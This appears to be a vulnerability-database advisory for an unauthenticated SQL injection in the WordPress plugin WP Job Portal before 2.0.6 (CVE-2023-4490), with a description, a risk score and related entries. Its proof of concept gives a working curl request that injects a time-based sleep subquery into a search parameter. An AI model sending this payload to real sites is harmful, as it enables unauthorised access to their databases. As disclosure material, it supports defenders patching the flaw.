Lucene search
Pablo SanchezWPVDB-ID:986024F0-3C8D-44D8-A9C9-1DD284D7DB0DHistoryAug 30, 2023 - 12:00 a.m.
WP Job Portal < 2.0.6 - Unauthenticated SQLi
2023-08-3000:00:00
Pablo Sanchez
wpscan.com
7
wordpress
job portal
sql injection
unauthenticated vulnerability
0.001 Low
EPSS
Percentile
51.2%
Description The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
PoC
Setup (as admin): Create a dummy company and a job (if there are none) Attack (as unauthenticated): time curl -X POST --data ‘jobtitle=a&city;=(select*from(select(sleep(10)))a)&wpjobportallay;=jobs&WPJOBPORTAL;_form_search=WPJOBPORTAL_SEARCH’ https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/ and notice the 10s delay of the response
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.0.6 |
Related
prion
prion
Sql injection
2023-09-25 16:15:00
cvelist
cvelist
CVE-2023-4490 WP Job Portal < 2.0.6 - Unauthenticated SQLi
2023-09-25 15:56:52
nvd
nvd
CVE-2023-4490
2023-09-25 16:15:15
wpexploit
wpexploit
WP Job Portal < 2.0.6 - Unauthenticated SQLi
2023-08-30 00:00:00
cve
cve
CVE-2023-4490
2023-09-25 16:15:15